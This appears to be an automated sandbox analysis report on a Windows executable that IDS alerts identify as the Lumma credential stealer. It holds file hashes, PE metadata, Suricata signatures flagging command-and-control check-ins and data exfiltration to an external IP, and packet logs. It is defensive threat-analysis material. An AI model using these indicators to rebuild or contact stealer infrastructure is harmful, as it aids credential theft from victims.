                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tccrqxpa.nrg.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnu0lkeo.f3g.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgif1xjs.lhn.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\nhrhvnf\ghhqoznpon_638708802577261661.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\OiMp3TH.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1282560
                                                                                                        Entropy (8bit):7.991635882513212
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:wDbwKqRFojedLVqKKRUSTL7b8OZJhh4va9Sexo+/eyha7twooF7cpvgzMca/i60:wDkOjGZqK9SfXBZMQSe/ecEloJcpGMcJ
                                                                                                        MD5:2A64267B616C528EE9618165671CCA9A
                                                                                                        SHA1:26750A26D5FFEF41C83B277CDD90710B21F25837
                                                                                                        SHA-256:A44491EBA8F23F6C39F017B1C05BAEDF10ACB595D38F303397DAA8F0AA0FF27E
                                                                                                        SHA-512:E8C0B1985E17CFC69D7B56A1F8995BAB24E991DC9A4FB7C8B83069FFAD44F1A98B752122D67ADC60A3EED2F727A65A06168867ACD85579F25CF2F111E8BC5BA3
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..........................................@...........................;...........@................................. `-..............................`-.........................................................................................................................@............0... ......."..............@................P...4...0..............@............@...0...$...d..............@.............'..p......................@....data....P...`-..P...B..............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.5870805902344856
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        File name:OiMp3TH.exe
                                                                                                        File size:94'720 bytes
                                                                                                        MD5:ab408f4eb577eda6d98941ede1b44863
                                                                                                        SHA1:95035cc5625641877753b56595972972732a7163
                                                                                                        SHA256:a3489b28d0560fdb0bb7ab3191ee01e051f96bb4ebb0d979cea7976ebab5139f
                                                                                                        SHA512:5df00b30171250889468c19c6dff821fa4e776835d655b782f6411197d516cebed593f2ff03e3739cde3355bf3758ea26c683f7092a53975ad6686f65a563179
                                                                                                        SSDEEP:1536:bXbvRCqBSR3iW5hhtTqHmEpHP8Q1a37KNeIdJj6vbXee4BTBGAQ3wz14XPoBrR:bXbvRCqBShiWPn2GwkR7QxdJjybXe9px
                                                                                                        TLSH:9593CF9D17E88334F1FFAB3469BA42404BB2BD97E976BB0C194524A42D33780C529F75
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9=6..........."...0..T...........r... ........@.. ....................................`................................

                                                                                                        File Icon

                                                                                                        Icon Hash:136cb2b27171b24d

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x40721a
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x8D363D39 [Fri Jan 27 15:01:13 2045 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x71c80x4f.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x11914.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x71380x38.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x20000x52200x54000d934b75c3cf07bd796890a2e215ac1cFalse0.42429315476190477data5.3517639849837835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x80000x119140x11a00c0ba5a2b4cffefab68b1ff537ff76c6cFalse0.9767564273049646data7.951237396001796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x1a0000xc0x200086a33fc17e8bb0a98221be0ad3fd867False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0x81e00xd5e7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0004748077941525
                                                                                                        RT_ICON0x157d80x1363PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0022164013701391
                                                                                                        RT_ICON0x16b4c0xc9dPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0034066274388356
                                                                                                        RT_ICON0x177fc0x9daPNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced1.0043616177636796
                                                                                                        RT_ICON0x181e80x691PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.006543723973825
                                                                                                        RT_ICON0x1888c0x490PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.009417808219178
                                                                                                        RT_ICON0x18d2c0x396PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced1.0119825708061003
                                                                                                        RT_ICON0x190d40x299PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0165413533834586
                                                                                                        RT_GROUP_ICON0x193800x76data0.7542372881355932
                                                                                                        RT_VERSION0x194080x30cdata0.4217948717948718
                                                                                                        RT_MANIFEST0x197240x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        mscoree.dll_CorExeMain

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-27T13:11:07.221826+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:08.213577+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549706172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:08.213577+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:09.447823+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:10.224644+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549707172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:10.224644+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:12.014251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:15.042052+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:15.889620+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549713172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:17.342320+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:19.972669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549725172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:22.467303+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549733172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:22.470686+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549733172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:27.031637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549744172.67.216.236443TCP
                                                                                                        2024-12-27T13:11:28.083267+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549744172.67.216.236443TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 27, 2024 13:10:58.451014996 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:10:58.451077938 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:10:58.451329947 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:10:58.463287115 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:10:58.463316917 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:00.116440058 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:00.116689920 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:00.120071888 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:00.120086908 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:00.120331049 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:00.159904003 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:00.207344055 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246042013 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246145964 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246210098 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246329069 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:01.246329069 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:01.251153946 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:01.397831917 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:01.397918940 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.398010969 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:01.398328066 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:01.398344040 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.611799955 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.611979961 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:02.614635944 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:02.614648104 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.614856005 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.616353989 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:02.659332037 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091245890 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091366053 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091396093 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091418982 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091445923 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091525078 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.091525078 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.091548920 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091593981 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.108556032 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.112440109 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.112505913 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.112512112 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.120810032 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.120870113 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.120964050 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.120970011 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.121016979 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.210907936 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.263978958 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.283488035 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287206888 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287271976 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.287276030 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287288904 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287336111 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.294737101 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.302318096 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.302381992 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.302388906 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.309819937 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.309865952 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.309879065 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.317378044 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.317444086 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.317460060 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.357825041 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.357835054 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371108055 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371118069 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371145010 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371157885 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371167898 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371181011 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.371191025 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371210098 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371217966 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.371243000 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.420237064 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.492289066 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492299080 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492332935 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492342949 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492443085 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.492451906 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492479086 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.492501020 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.519886971 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519895077 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519922018 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519948006 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519954920 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.519963026 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519992113 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.520005941 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.546848059 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.546865940 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.546950102 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.546962976 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.547005892 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.581506014 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.581525087 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.581604958 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.581625938 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.581667900 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.681343079 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.681361914 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.681468964 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.681478977 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.681695938 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.700962067 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.700975895 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.701064110 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.701070070 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.701113939 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.717876911 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.717891932 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.717981100 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.717987061 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.718031883 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.734569073 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.734582901 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.734764099 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.734767914 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.734816074 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.749183893 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.749198914 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.749264956 CET49705443192.168.2.5185.199.108.133
